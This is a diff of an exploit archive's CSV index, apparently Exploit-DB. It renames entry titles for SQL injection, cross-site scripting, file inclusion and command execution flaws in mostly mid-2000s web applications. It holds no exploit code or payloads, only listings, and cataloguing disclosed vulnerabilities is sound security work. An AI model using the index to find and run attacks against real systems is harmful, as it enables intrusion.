26284,platforms/php/webapps/26284.txt,"MX Shop 3.2 Index.PHP Multiple SQL Injection Vulnerabilities",2005-09-19,"David Sopas Ferreira",php,webapps,0 26285,platforms/php/webapps/26285.txt,"Hesk 0.92/0.93 Session ID Authentication Bypass Vulnerability",2005-09-20,"Rajesh Sethumadhavan",php,webapps,0 -26286,platforms/php/webapps/26286.txt,"PHP Advanced Transfer Manager 1.30 Multiple Directory Traversal Vulnerabilities",2005-09-20,rgod,php,webapps,0 -26287,platforms/php/webapps/26287.txt,"PHP Advanced Transfer Manager 1.30 Multiple Cross-Site Scripting Vulnerabilities",2005-09-20,rgod,php,webapps,0 +26286,platforms/php/webapps/26286.txt,"PHP Advanced Transfer Manager 1.30 - Multiple Directory Traversal Vulnerabilities",2005-09-20,rgod,php,webapps,0 +26287,platforms/php/webapps/26287.txt,"PHP Advanced Transfer Manager 1.30 - Multiple Cross-Site Scripting Vulnerabilities",2005-09-20,rgod,php,webapps,0 26288,platforms/linux/remote/26288.txt,"Mozilla Browser/Firefox Arbitrary Command Execution Vulnerability",2005-09-20,"eter Zelezny",linux,remote,0 26289,platforms/cgi/webapps/26289.txt,"Alkalay.Net Multiple Scripts Arbitrary Remote Command Execution Vulnerabilities",2005-08-21,sullo@cirt.net,cgi,webapps,0 26290,platforms/cgi/webapps/26290.txt,"PerlDiver 2.31 Perldiver.CGI Cross-Site Scripting Vulnerability",2005-08-21,"Donnie Werner",cgi,webapps,0 @@ -23505,7 +23505,7 @@ id,file,description,date,author,platform,type,port 26431,platforms/php/webapps/26431.txt,"ATutor 1.x forum.inc.php Arbitrary Command Execution",2005-10-27,"Andreas Sandblad",php,webapps,0 26432,platforms/php/webapps/26432.txt,"ATutor 1.x body_header.inc.php section Parameter Local File Inclusion",2005-10-27,"Andreas Sandblad",php,webapps,0 26433,platforms/php/webapps/26433.txt,"ATutor 1.x print.php section Parameter Remote File Inclusion",2005-10-27,"Andreas Sandblad",php,webapps,0 -26434,platforms/php/webapps/26434.txt,"PBLang 4.65 Multiple Cross-Site Scripting Vulnerabilities",2005-10-27,abducter,php,webapps,0 +26434,platforms/php/webapps/26434.txt,"PBLang 4.65 - Multiple Cross-Site Scripting Vulnerabilities",2005-10-27,abducter,php,webapps,0 26435,platforms/asp/webapps/26435.txt,"ASP Fast Forum Error.ASP Cross-Site Scripting Vulnerability",2005-10-27,syst3m_f4ult,asp,webapps,0 26436,platforms/php/webapps/26436.txt,"MG2 0.5.1 Authentication Bypass Vulnerability",2005-10-29,"Preben Nylokken",php,webapps,0 26437,platforms/php/webapps/26437.txt,"PHP Advanced Transfer Manager 1.30 Remote Unauthorized Access Vulnerability",2005-10-29,Zeelock,php,webapps,0 @@ -23569,7 +23569,7 @@ id,file,description,date,author,platform,type,port 26496,platforms/hardware/webapps/26496.txt,"eFile Wifi Transfer Manager 1.0 - Multiple Vulnerabilities",2013-06-30,Vulnerability-Lab,hardware,webapps,8080 26497,platforms/windows/remote/26497.c,"RealNetworks RealOne Player/RealPlayer RM File Remote Stack Based Buffer Overflow Vulnerability",2005-11-10,nolimit,windows,remote,0 26498,platforms/linux/local/26498.txt,"Sudo Perl 1.6.x Environment Variable Handling Security Bypass Vulnerability",2005-11-11,"Charles Morris",linux,local,0 -26499,platforms/php/webapps/26499.txt,"PHPSysInfo 2.x Multiple Input Validation Vulnerabilities",2005-11-11,anonymous,php,webapps,0 +26499,platforms/php/webapps/26499.txt,"PHPSysInfo 2.x - Multiple Input Validation Vulnerabilities",2005-11-11,anonymous,php,webapps,0 26500,platforms/php/webapps/26500.txt,"PHPWebThings 1.4 Download.PHP File Parameter SQL Injection Vulnerability",2005-11-12,A.1.M,php,webapps,0 26501,platforms/php/webapps/26501.txt,"ActiveCampaign 1-2-All Broadcast Email 4.0 Admin Control Panel Username SQL Injection Vulnerability",2005-11-12,bhs_team,php,webapps,0 26502,platforms/php/webapps/26502.txt,"Help Center Live 1.0/1.2/2.0 Module.PHP Local File Include Vulnerability",2005-11-14,"HACKERS PAL",php,webapps,0 @@ -23585,7 +23585,7 @@ id,file,description,date,author,platform,type,port 26512,platforms/php/webapps/26512.txt,"phpwcms 1.2.5 -DEV login.php form_lang Parameter Traversal Arbitrary File Access",2005-11-15,"Stefan Lochbihler",php,webapps,0 26513,platforms/php/webapps/26513.txt,"phpwcms 1.2.5 -DEV random_image.php imgdir Parameter Traversal Arbitrary File Access",2005-11-15,"Stefan Lochbihler",php,webapps,0 26514,platforms/php/webapps/26514.txt,"PHPWCMS 1.2.5 -DEV Multiple Cross-Site Scripting Vulnerabilities",2005-11-15,"Stefan Lochbihler",php,webapps,0 -26515,platforms/php/webapps/26515.txt,"AlstraSoft Template Seller Pro 3.25 Remote File Include Vulnerability",2005-11-15,"Robin Verton",php,webapps,0 +26515,platforms/php/webapps/26515.txt,"AlstraSoft Template Seller Pro 3.25 - Remote File Include Vulnerability",2005-11-15,"Robin Verton",php,webapps,0 26516,platforms/php/webapps/26516.txt,"Ekinboard 1.0.3 Profile.PHP Cross-Site Scripting Vulnerability",2005-11-15,trueend5,php,webapps,0 26517,platforms/windows/dos/26517.txt,"Microsoft Office PowerPoint 2007 - Crash PoC",2013-07-01,Asesino04,windows,dos,0 26519,platforms/windows/dos/26519.py,"AVS Media Player 4.1.11.100 (.ac3) - Denial of Service",2013-07-01,metacom,windows,dos,0 @@ -23603,7 +23603,7 @@ id,file,description,date,author,platform,type,port 26533,platforms/jsp/webapps/26533.txt,"Revize CMS Revize.XML Information Disclosure Vulnerability",2005-11-17,Lostmon,jsp,webapps,0 26534,platforms/jsp/webapps/26534.txt,"Revize CMS HTTPTranslatorServlet Cross-Site Scripting Vulnerability",2005-11-17,Lostmon,jsp,webapps,0 26535,platforms/php/webapps/26535.txt,"LiteSpeed 2.1.5 ConfMgr.php Cross-Site Scripting Vulnerability",2005-11-17,"Gama Sec",php,webapps,0 -26536,platforms/linux/remote/26536.txt,"qualcomm worldmail server 3.0 - Directory Traversal vulnerability",2005-11-17,FistFuXXer,linux,remote,0 +26536,platforms/linux/remote/26536.txt,"qualcomm worldmail server 3.0 - Directory Traversal Vulnerability",2005-11-17,FistFuXXer,linux,remote,0 26537,platforms/asp/webapps/26537.html,"VP-ASP Shopping Cart Shopadmin.ASP HTML Injection Vulnerability",2005-11-17,ConcorDHacK,asp,webapps,0 26538,platforms/php/webapps/26538.txt,"PHP-Fusion 4.0/5.0/6.0 Options.php and Viewforum.php SQL Injection Vulnerabilities",2005-11-19,"Robin Verton",php,webapps,0 26539,platforms/php/webapps/26539.txt,"Advanced Poll 2.0.2/2.0.3 Popup.PHP Cross-Site Scripting Vulnerability",2005-11-21,[GB],php,webapps,0 @@ -23662,9 +23662,9 @@ id,file,description,date,author,platform,type,port 26594,platforms/php/webapps/26594.txt,"efiction 1.0/1.1/2.0 viewuser.php uid Parameter SQL Injection",2005-11-25,retrogod@aliceposta.it,php,webapps,0 26595,platforms/php/webapps/26595.txt,"IsolSoft Support Center 2.2 - Multiple SQL Injection Vulnerabilities",2005-11-25,r0t3d3Vil,php,webapps,0 26596,platforms/php/webapps/26596.txt,"AgileBill 1.4.92 Product_Cat SQL Injection Vulnerability",2005-11-25,r0t,php,webapps,0 -26597,platforms/php/webapps/26597.txt,"PBLang Bulletin Board System 4.65 Multiple HTML Injection Vulnerabilities",2005-11-26,r0xes,php,webapps,0 +26597,platforms/php/webapps/26597.txt,"PBLang Bulletin Board System 4.65 - Multiple HTML Injection Vulnerabilities",2005-11-26,r0xes,php,webapps,0 26598,platforms/php/webapps/26598.txt,"Athena PHP Website Administration 0.1 - Remote File Include Vulnerability",2005-11-26,[GB],php,webapps,0 -26599,platforms/php/webapps/26599.txt,"PHPGreetz 0.99 Remote File Include Vulnerability",2005-11-26,[GB],php,webapps,0 +26599,platforms/php/webapps/26599.txt,"PHPGreetz 0.99 - Remote File Include Vulnerability",2005-11-26,[GB],php,webapps,0 26600,platforms/php/webapps/26600.txt,"Q-News 2.0 - Remote File Include Vulnerability",2005-11-26,[GB],php,webapps,0 26601,platforms/linux/dos/26601.pl,"Unalz 0.x Archive Filename Buffer Overflow Vulnerability",2005-11-28,"Ulf Harnhammar",linux,dos,0 26602,platforms/php/webapps/26602.txt,"Enterprise Heart Enterprise Connector 1.0.2 send.php messageid Parameter SQL Injection",2005-11-28,r0t,php,webapps,0 @@ -23678,10 +23678,10 @@ id,file,description,date,author,platform,type,port 26610,platforms/php/webapps/26610.txt,"Bedeng PSP 1.1 download.php a.ngroup Parameter SQL Injection",2005-11-28,r0t,php,webapps,0 26611,platforms/php/webapps/26611.txt,"Bedeng PSP 1.1 index.php a.nsub Parameter SQL Injection",2005-11-28,r0t,php,webapps,0 26612,platforms/php/webapps/26612.txt,"Nelogic Nephp Publisher 4.5.2 - SQL Injection Vulnerabilities",2005-11-28,r0t,php,webapps,0 -26613,platforms/php/webapps/26613.txt,"Softbiz Resource Repository Script 0 details_res.php sbres_id Parameter SQL Injection",2005-11-28,r0t,php,webapps,0 -26614,platforms/php/webapps/26614.txt,"Softbiz Resource Repository Script 0 showcats.php sbcat_id Parameter SQL Injection",2005-11-28,r0t,php,webapps,0 -26615,platforms/php/webapps/26615.txt,"Softbiz Resource Repository Script 0 refer_friend.php sbres_id Parameter SQL Injection",2005-11-28,r0t,php,webapps,0 -26616,platforms/php/webapps/26616.txt,"Softbiz Resource Repository Script 0 report_link.php sbres_id Parameter SQL Injection",2005-11-28,r0t,php,webapps,0 +26613,platforms/php/webapps/26613.txt,"Softbiz Resource Repository Script - details_res.php sbres_id Parameter SQL Injection",2005-11-28,r0t,php,webapps,0 +26614,platforms/php/webapps/26614.txt,"Softbiz Resource Repository Script - showcats.php sbcat_id Parameter SQL Injection",2005-11-28,r0t,php,webapps,0 +26615,platforms/php/webapps/26615.txt,"Softbiz Resource Repository Script - refer_friend.php sbres_id Parameter SQL Injection",2005-11-28,r0t,php,webapps,0 +26616,platforms/php/webapps/26616.txt,"Softbiz Resource Repository Script - report_link.php sbres_id Parameter SQL Injection",2005-11-28,r0t,php,webapps,0 26617,platforms/php/webapps/26617.txt,"BerliOS SourceWell 1.1.3 - SQL Injection Vulnerability",2005-11-28,r0t,php,webapps,0 26618,platforms/php/webapps/26618.txt,"AllWeb Search 3.0 - SQL Injection Vulnerability",2005-11-28,r0t,php,webapps,0 26619,platforms/php/webapps/26619.txt,"K-Search 1.0 - SQL Injection Vulnerabilities",2005-11-28,r0t,php,webapps,0 @@ -23727,7 +23727,7 @@ id,file,description,date,author,platform,type,port 26660,platforms/php/webapps/26660.txt,"FAQ System 1.1 index.php CATEGORY_ID Parameter SQL Injection",2005-11-29,r0t,php,webapps,0 26661,platforms/php/webapps/26661.txt,"Survey System 1.1 Survey.PHP SQL Injection Vulnerability",2005-11-29,r0t,php,webapps,0 26662,platforms/php/webapps/26662.php,"N-13 News 1.2 - SQL Injection Vulnerability",2005-11-29,KingOfSka,php,webapps,0 -26663,platforms/php/webapps/26663.txt,"DRZES HMS 3.2 - Multiple SQL Injection Vulnerabilities",2005-11-29,r0t,php,webapps,0 +26663,platforms/php/webapps/26663.txt,"DRZES Hms 3.2 - Multiple SQL Injection Vulnerabilities",2005-11-29,r0t,php,webapps,0 26664,platforms/hardware/webapps/26664.txt,"Multiple D-Link Devices - OS-Command Injection via UPnP Interface",2013-07-07,m-1-k-3,hardware,webapps,0 26665,platforms/windows/dos/26665.pl,"pcAnywhere 8.0/9.0/11.x Authentication Denial of Service Vulnerability",2006-01-17,"David Maciejak",windows,dos,0 26666,platforms/linux/dos/26666.c,"CenterICQ 4.20/4.5 Malformed Packet Handling Remote Denial of Service Vulnerability",2005-11-29,"Wernfried Haas",linux,dos,0 @@ -23774,7 +23774,7 @@ id,file,description,date,author,platform,type,port 26707,platforms/php/webapps/26707.txt,"Alisveristr E-commerce Login Multiple SQL Injection Vulnerabilities",2005-12-03,B3g0k,php,webapps,0 26708,platforms/windows/local/26708.rb,"ERS Viewer 2013 ERS File Handling Buffer Overflow",2013-07-09,metasploit,windows,local,0 26709,platforms/lin_x86/local/26709.txt,"Solaris Recommended Patch Cluster 6/19 Local root on x86",2013-07-09,"Larry W. Cashdollar",lin_x86,local,0 -26710,platforms/multiple/dos/26710.txt,"Apache CXF prior to 2.5.10, 2.6.7 and 2.7.4 - Denial of Service",2013-07-09,"SEC Consult",multiple,dos,0 +26710,platforms/multiple/dos/26710.txt,"Apache CXF < 2.5.10 / 2.6.7 / 2.7.4 - Denial of Service",2013-07-09,"SEC Consult",multiple,dos,0 26713,platforms/php/webapps/26713.txt,"phpYellowTM 5.33 search_result.php haystack Parameter SQL Injection",2005-12-03,r0t3d3Vil,php,webapps,0 26714,platforms/php/webapps/26714.txt,"phpYellowTM 5.33 print_me.php ckey Parameter SQL Injection",2005-12-03,r0t3d3Vil,php,webapps,0 26715,platforms/php/webapps/26715.txt,"Widget Property 1.1.19 Property.PHP SQL Injection Vulnerability",2005-11-05,r0t3d3Vil,php,webapps,0 @@ -23808,7 +23808,7 @@ id,file,description,date,author,platform,type,port 26745,platforms/asp/webapps/26745.txt,"RWAuction Pro 4.0 Search.ASP Cross-Site Scripting Vulnerability",2005-12-06,r0t,asp,webapps,0 26746,platforms/asp/webapps/26746.txt,"A-FAQ 1.0 faqDspItem.asp faqid Parameter SQL Injection",2005-12-06,r0t,asp,webapps,0 26747,platforms/asp/webapps/26747.txt,"A-FAQ 1.0 faqDsp.asp catcode Parameter SQL Injection",2005-12-06,r0t,asp,webapps,0 -26748,platforms/php/webapps/26748.txt,"DoceboLMS 2.0.x Connector.PHP Directory Traversal Vulnerability",2005-12-06,rgod,php,webapps,0 +26748,platforms/php/webapps/26748.txt,"DoceboLms 2.0.x Connector.PHP Directory Traversal Vulnerability",2005-12-06,rgod,php,webapps,0 26749,platforms/linux/dos/26749.c,"Linux Kernel 2.6.x - File Lock Lease Local Denial of Service Vulnerability",2005-12-29,"J. Bruce Fields",linux,dos,0 26750,platforms/php/webapps/26750.txt,"PluggedOut Blog 1.9.x Index.PHP Multiple SQL Injection Vulnerabilities",2005-12-06,r0t,php,webapps,0 26751,platforms/php/webapps/26751.txt,"Cars Portal 1.1 Index.PHP Multiple SQL Injection Vulnerabilities",2005-12-06,r0t,php,webapps,0 @@ -23818,7 +23818,7 @@ id,file,description,date,author,platform,type,port 26755,platforms/php/webapps/26755.txt,"Thwboard Beta 2.8 calendar.php year Parameter SQL Injection",2005-12-07,trueend5,php,webapps,0 26756,platforms/php/webapps/26756.txt,"Thwboard Beta 2.8 v_profile.php user Parameter SQL Injection",2005-12-07,trueend5,php,webapps,0 26757,platforms/php/webapps/26757.txt,"Thwboard Beta 2.8 misc.php userid Parameter SQL Injection",2005-12-07,trueend5,php,webapps,0 -26758,platforms/php/webapps/26758.txt,"DRZES HMS 3.2 Login.PHP Cross-Site Scripting Vulnerability",2005-12-07,Vipsta,php,webapps,0 +26758,platforms/php/webapps/26758.txt,"DRZES Hms 3.2 Login.PHP Cross-Site Scripting Vulnerability",2005-12-07,Vipsta,php,webapps,0 26759,platforms/asp/webapps/26759.txt,"ASPMForum forum.asp baslik Parameter SQL Injection",2005-12-07,dj_eyes2005,asp,webapps,0 26760,platforms/asp/webapps/26760.txt,"ASPMForum kullanicilistesi.asp harf Parameter SQL Injection",2005-12-07,dj_eyes2005,asp,webapps,0 26761,platforms/cgi/webapps/26761.txt,"Dell TrueMobile 2300 Remote Credential Reset Vulnerability",2005-12-07,TNull,cgi,webapps,0 @@ -23923,21 +23923,21 @@ id,file,description,date,author,platform,type,port 26861,platforms/cgi/webapps/26861.txt,"ScareCrow 2.13 forum.cgi forum Parameter XSS",2005-12-16,r0t3d3Vil,cgi,webapps,0 26862,platforms/cgi/webapps/26862.txt,"ScareCrow 2.13 profile.cgi user Parameter XSS",2005-12-16,r0t3d3Vil,cgi,webapps,0 26863,platforms/cgi/webapps/26863.txt,"ScareCrow 2.13 post.cgi forum Parameter XSS",2005-12-16,r0t3d3Vil,cgi,webapps,0 -26864,platforms/cgi/webapps/26864.txt,"WebGlimpse 2.x Cross-Site Scripting Vulnerability",2005-12-16,r0t3d3Vil,cgi,webapps,0 +26864,platforms/cgi/webapps/26864.txt,"WebGlimpse 2.x - Cross-Site Scripting Vulnerability",2005-12-16,r0t3d3Vil,cgi,webapps,0 26865,platforms/cgi/webapps/26865.txt,"WebCal 3.0 4 webcal.cgi Multiple Parameter XSS",2005-12-16,"Stan Bubrouski",cgi,webapps,0 26866,platforms/php/webapps/26866.txt,"Round Cube Webmail 0.1 -20051021 Path Disclosure Weakness",2005-12-17,king_purba,php,webapps,0 26867,platforms/php/webapps/26867.txt,"PHP Fusebox 3.0 Index.PHP Cross-Site Scripting Vulnerability",2005-12-19,"bogel and lukman",php,webapps,0 26868,platforms/php/webapps/26868.txt,"JPortal 2.2.1/2.3 Forum Forum.PHP SQL Injection Vulnerability",2005-12-19,Zbigniew,php,webapps,0 26869,platforms/windows/dos/26869.txt,"Microsoft Excel 95/97/2000/2002/2003/2004 Unspecified Memory Corruption Vulnerabilities",2005-12-19,ad@heapoverflow.com,windows,dos,0 -26870,platforms/php/webapps/26870.txt,"Advanced Guestbook 2.x Multiple Cross-Site Scripting Vulnerabilities",2005-12-19,Handrix,php,webapps,0 -26871,platforms/php/webapps/26871.txt,"PlaySMS Index.PHP Cross-Site Scripting Vulnerability",2005-12-19,mohajali2k4,php,webapps,0 +26870,platforms/php/webapps/26870.txt,"Advanced Guestbook 2.x - Multiple Cross-Site Scripting Vulnerabilities",2005-12-19,Handrix,php,webapps,0 +26871,platforms/php/webapps/26871.txt,"PlaySms Index.PHP Cross-Site Scripting Vulnerability",2005-12-19,mohajali2k4,php,webapps,0 26872,platforms/php/webapps/26872.txt,"PHP-Fusion 6.0 Members.PHP Cross-Site Scripting Vulnerability",2005-12-19,krasza,php,webapps,0 26873,platforms/asp/webapps/26873.txt,"Acidcat CMS 2.1.13 default.asp ID Parameter SQL Injection",2005-12-19,admin@hamid.ir,asp,webapps,0 26874,platforms/asp/webapps/26874.txt,"Acidcat CMS 2.1.13 acidcat.mdb Remote Information Disclosure",2005-12-19,admin@hamid.ir,asp,webapps,0 26875,platforms/asp/webapps/26875.txt,"allinta CMS 2.3.2 faq.asp s Parameter XSS",2005-12-19,r0t3d3Vil,asp,webapps,0 26876,platforms/asp/webapps/26876.txt,"allinta CMS 2.3.2 search.asp searchQuery Parameter XSS",2005-12-19,r0t3d3Vil,asp,webapps,0 26877,platforms/php/webapps/26877.txt,"Box UK Amaxus CMS 3.0 Cross-Site Scripting Vulnerability",2005-12-19,r0t3d3Vil,php,webapps,0 -26878,platforms/php/webapps/26878.txt,"Caravel CMS 3.0 Beta 1 Multiple Cross-Site Scripting Vulnerabilities",2005-12-19,r0t3d3Vil,php,webapps,0 +26878,platforms/php/webapps/26878.txt,"Caravel CMS 3.0 Beta 1 - Multiple Cross-Site Scripting Vulnerabilities",2005-12-19,r0t3d3Vil,php,webapps,0 26879,platforms/php/webapps/26879.txt,"Cofax 2.0 Search.HTM Cross-Site Scripting Vulnerability",2005-12-19,r0t3d3Vil,php,webapps,0 26880,platforms/php/webapps/26880.txt,"FLIP 0.9 .0.1029 text.php name Parameter XSS",2005-12-19,r0t3d3Vil,php,webapps,0 26881,platforms/php/webapps/26881.txt,"FLIP 0.9 .0.1029 forum.php frame Parameter XSS",2005-12-19,r0t3d3Vil,php,webapps,0 @@ -23962,13 +23962,13 @@ id,file,description,date,author,platform,type,port 26900,platforms/php/webapps/26900.txt,"Miraserver 1.0 RC4 index.php page Parameter SQL Injection",2005-12-19,r0t,php,webapps,0 26901,platforms/php/webapps/26901.txt,"Miraserver 1.0 RC4 newsitem.php id Parameter SQL Injection",2005-12-19,r0t,php,webapps,0 26902,platforms/php/webapps/26902.txt,"Miraserver 1.0 RC4 article.php cat Parameter SQL Injection",2005-12-19,r0t,php,webapps,0 -26903,platforms/asp/webapps/26903.txt,"Baseline CMS 1.95 Multiple Input Validation Vulnerabilities",2005-12-19,r0t,asp,webapps,0 +26903,platforms/asp/webapps/26903.txt,"Baseline CMS 1.95 - Multiple Input Validation Vulnerabilities",2005-12-19,r0t,asp,webapps,0 26904,platforms/php/webapps/26904.txt,"Bitweaver 1.1.1 beta list_galleries.php sort_mode Parameter XSS",2005-12-19,r0t,php,webapps,0 26905,platforms/php/webapps/26905.txt,"Bitweaver 1.1.1 view_post.php post_id Parameter XSS",2005-12-19,r0t,php,webapps,0 26906,platforms/php/webapps/26906.txt,"Bitweaver 1.1.1 view.php blog_id Parameter XSS",2005-12-19,r0t,php,webapps,0 26907,platforms/php/webapps/26907.txt,"Bitweaver 1.1.1 message_box.php sort_mode Parameter XSS",2005-12-19,r0t,php,webapps,0 26908,platforms/php/webapps/26908.txt,"Bitweaver 1.1.1 my.php sort_mode Parameter XSS",2005-12-19,r0t,php,webapps,0 -26909,platforms/cfm/webapps/26909.txt,"Community Enterprise 4.x Multiple Input Validation Vulnerabilities",2005-12-19,r0t3d3Vil,cfm,webapps,0 +26909,platforms/cfm/webapps/26909.txt,"Community Enterprise 4.x - Multiple Input Validation Vulnerabilities",2005-12-19,r0t3d3Vil,cfm,webapps,0 26910,platforms/cfm/webapps/26910.txt,"E-Publish 2.0 - Multiple Input Validation Vulnerabilities",2005-12-19,r0t3d3Vil,cfm,webapps,0 26911,platforms/php/webapps/26911.txt,"Komodo CMS 2.1 - Multiple Input Validation Vulnerabilities",2005-12-19,r0t3d3Vil,php,webapps,0 26912,platforms/php/webapps/26912.txt,"Mercury CMS 4.0 - Multiple Input Validation Vulnerabilities",2005-12-19,r0t3d3Vil,php,webapps,0 @@ -23977,7 +23977,7 @@ id,file,description,date,author,platform,type,port 26915,platforms/linux/dos/26915.txt,"Blender BlenLoader 2.x File Processing Integer Overflow Vulnerability",2005-12-20,"Damian Put",linux,dos,0 26916,platforms/php/webapps/26916.txt,"Enterprise Connector 1.0.2 Main.PHP SQL Injection Vulnerability",2005-12-20,"Attila Gerendi",php,webapps,0 26917,platforms/cgi/webapps/26917.txt,"LiveJournal Cleanhtml.PL HTML Injection Vulnerability",2005-12-20,"Andrew Farmer",cgi,webapps,0 -26918,platforms/php/webapps/26918.txt,"Plogger Beta 2 Remote File Include Vulnerabilities",2005-12-20,"Security .Net Information",php,webapps,0 +26918,platforms/php/webapps/26918.txt,"Plogger Beta 2 - Remote File Include Vulnerabilities",2005-12-20,"Security .Net Information",php,webapps,0 26919,platforms/php/webapps/26919.txt,"AbleDesign D-Man 3.0 Title Parameter Cross-Site Scripting Vulnerability",2005-12-20,$um$id,php,webapps,0 26920,platforms/cfm/webapps/26920.txt,"Quick Square Development Honeycomb Archive 3.0 CategoryResults.cfm Multiple Parameter SQL Injection",2005-12-20,r0t3d3Vil,cfm,webapps,0 26921,platforms/php/webapps/26921.txt,"Tolva 0.1 Usermods.PHP Remote File Include Vulnerability",2005-12-21,xbefordx,php,webapps,0 @@ -24048,12 +24048,12 @@ id,file,description,date,author,platform,type,port 26986,platforms/cfm/webapps/26986.txt,"PaperThin CommonSpot Content Server 4.5 Cross-Site Scripting Vulnerability",2005-12-23,r0t3d3Vil,cfm,webapps,0 26987,platforms/java/webapps/26987.txt,"FatWire UpdateEngine 6.2 - Multiple Cross-Site Scripting Vulnerabilities",2005-12-27,r0t3d3Vil,java,webapps,0 26988,platforms/php/webapps/26988.txt,"Koobi 5.0 BBCode URL Tag Script Injection Vulnerability",2005-12-28,"kurdish hackers team",php,webapps,0 -26989,platforms/php/webapps/26989.txt,"GMailSite 1.0.x Cross-Site Scripting Vulnerability",2005-12-29,Lostmon,php,webapps,0 +26989,platforms/php/webapps/26989.txt,"GMailSite 1.0.x - Cross-Site Scripting Vulnerability",2005-12-29,Lostmon,php,webapps,0 26990,platforms/php/webapps/26990.txt,"MyBB 1.0 Globa.PHP Cookie Data SQL Injection Vulnerability",2005-12-29,imei,php,webapps,0 26991,platforms/asp/webapps/26991.html,"Web Wiz Multiple Products SQL Injection Vulnerability",2005-12-30,DevilBox,asp,webapps,0 26992,platforms/php/webapps/26992.txt,"Ades Design AdesGuestbook 2.0 Read Script Cross-Site Scripting Vulnerability",2005-12-30,r0t3d3Vil,php,webapps,0 26993,platforms/php/webapps/26993.txt,"OOApp Guestbook 2.1 Home Script Cross-Site Scripting Vulnerability",2005-12-30,r0t3d3Vil,php,webapps,0 -26994,platforms/php/webapps/26994.txt,"Kayako SupportSuite 3.0 0.26 Multiple Cross-Site Scripting Vulnerabilities",2005-12-30,r0t3d3Vil,php,webapps,0 +26994,platforms/php/webapps/26994.txt,"Kayako SupportSuite 3.0 0.26 - Multiple Cross-Site Scripting Vulnerabilities",2005-12-30,r0t3d3Vil,php,webapps,0 26995,platforms/php/webapps/26995.txt,"PHPDocumentor 1.2/1.3 Forum Lib Variable Cross-Site Scripting Vulnerability",2005-12-30,"zeus olimpusklan",php,webapps,0 26996,platforms/aix/local/26996.txt,"IBM AIX 5.3 GetShell and GetCommand File Enumeration Vulnerability",2005-12-30,xfocus,aix,local,0 26997,platforms/aix/local/26997.txt,"IBM AIX 5.3 GetShell and GetCommand Partial File Disclosure Vulnerability",2006-01-01,xfocus,aix,local,0 @@ -24079,7 +24079,7 @@ id,file,description,date,author,platform,type,port 27019,platforms/php/webapps/27019.txt,"VBulletin 3.5.2 Event Title HTML Injection Vulnerability",2006-02-01,trueend5,php,webapps,0 27020,platforms/php/webapps/27020.txt,"Drupal 4.x URL-Encoded Input HTML Injection Vulnerability",2006-01-01,liz0,php,webapps,0 27021,platforms/cgi/webapps/27021.txt,"DiscusWare Discus 3.10 Error Message Cross-Site Scripting Vulnerability",2006-01-02,$um$id,cgi,webapps,0 -27022,platforms/php/webapps/27022.txt,"INCOGEN Bugport 1.x Multiple SQL Injection Vulnerabilities",2006-01-03,r0t,php,webapps,0 +27022,platforms/php/webapps/27022.txt,"INCOGEN Bugport 1.x - Multiple SQL Injection Vulnerabilities",2006-01-03,r0t,php,webapps,0 27023,platforms/php/webapps/27023.txt,"INCOGEN Bugport 1.x Index.PHP Multiple Cross-Site Scripting Vulnerabilities",2006-01-03,r0t,php,webapps,0 27024,platforms/windows/remote/27024.txt,"EFileGo 3.0 - Multiple Input Validation Vulnerabilities",2006-01-03,dr_insane,windows,remote,0 27025,platforms/php/webapps/27025.txt,"Primo Place Primo Cart 1.0 - Multiple SQL Injection Vulnerabilities",2006-01-03,r0t,php,webapps,0 @@ -24090,7 +24090,7 @@ id,file,description,date,author,platform,type,port 27030,platforms/php/webapps/27030.txt,"CS-Cart Multiple SQL Injection Vulnerabilities",2005-12-25,r0t3d3Vil,php,webapps,0 27031,platforms/linux/dos/27031.c,"Linux Kernel 2.6.x - SET_MEMPOLICY Local Denial of Service Vulnerability",2006-01-04,"Doug Chapman",linux,dos,0 27032,platforms/linux/remote/27032.txt,"Hylafax 4.1/4.2 - Multiple Scripts Remote Command Execution Vulnerability",2006-01-05,"Patrice Fournier",linux,remote,0 -27033,platforms/php/webapps/27033.txt,"Foro Domus 2.10 Multiple Input Validation Vulnerabilities",2006-01-06,"Aliaksandr Hartsuyeu",php,webapps,0 +27033,platforms/php/webapps/27033.txt,"Foro Domus 2.10 - Multiple Input Validation Vulnerabilities",2006-01-06,"Aliaksandr Hartsuyeu",php,webapps,0 27034,platforms/asp/webapps/27034.txt,"OnePlug CMS /press/details.asp Press_Release_ID Parameter SQL Injection",2006-01-06,Preddy,asp,webapps,0 27035,platforms/asp/webapps/27035.txt,"OnePlug CMS /services/details.asp Service_ID Parameter SQL Injection",2006-01-06,Preddy,asp,webapps,0 27036,platforms/asp/webapps/27036.txt,"OnePlug CMS /products/details.asp Product_ID Parameter SQL Injection",2006-01-06,Preddy,asp,webapps,0 @@ -24109,7 +24109,7 @@ id,file,description,date,author,platform,type,port 27050,platforms/windows/dos/27050.txt,"DirectShow Arbitrary Memory Overwrite Vulnerability (MS13-056)",2013-07-23,"Andrés Gómez Ramírez",windows,dos,0 27051,platforms/windows/dos/27051.txt,"Microsoft Windows Graphics Rendering Engine Multiple Memory Corruption Vulnerabilities",2006-01-09,cocoruder,windows,dos,0 27052,platforms/php/webapps/27052.txt,"427BB 2.2 Showthread.PHP SQL Injection Vulnerability",2006-01-09,"Aliaksandr Hartsuyeu",php,webapps,0 -27053,platforms/php/webapps/27053.txt,"Venom Board Post.PHP3 Multiple SQL Injection Vulnerabilities",2006-01-09,"Aliaksandr Hartsuyeu",php,webapps,0 +27053,platforms/php/webapps/27053.txt,"Venom Board Post.PHP3 - Multiple SQL Injection Vulnerabilities",2006-01-09,"Aliaksandr Hartsuyeu",php,webapps,0 27054,platforms/php/webapps/27054.txt,"427BB 2.2 Authentication Bypass Vulnerability",2006-01-09,"Aliaksandr Hartsuyeu",php,webapps,0 27055,platforms/windows/dos/27055.txt,"Microsoft Excel 95-2004 Malformed Graphic File Code Execution Vulnerability",2006-01-09,ad@heapoverflow.com,windows,dos,0 27056,platforms/linux/local/27056.pl,"Sudo 1.6.x Environment Variable Handling Security Bypass Vulnerability (1)",2006-01-09,"Breno Silva Pinto",linux,local,0 @@ -24143,7 +24143,7 @@ id,file,description,date,author,platform,type,port 27085,platforms/php/webapps/27085.txt,"Bit 5 Blog 8.1 AddComment.PHP HTML Injection Vulnerability",2006-01-16,"Aliaksandr Hartsuyeu",php,webapps,0 27086,platforms/php/webapps/27086.txt,"White Album 2.5 Pictures.PHP SQL Injection Vulnerability",2006-01-16,liz0,php,webapps,0 27087,platforms/php/webapps/27087.txt,"GeoBlog 1.0 ViewCat.PHP SQL Injection Vulnerability",2005-01-16,"Aliaksandr Hartsuyeu",php,webapps,0 -27088,platforms/cgi/webapps/27088.txt,"Faq-O-Matic 2.711 Multiple 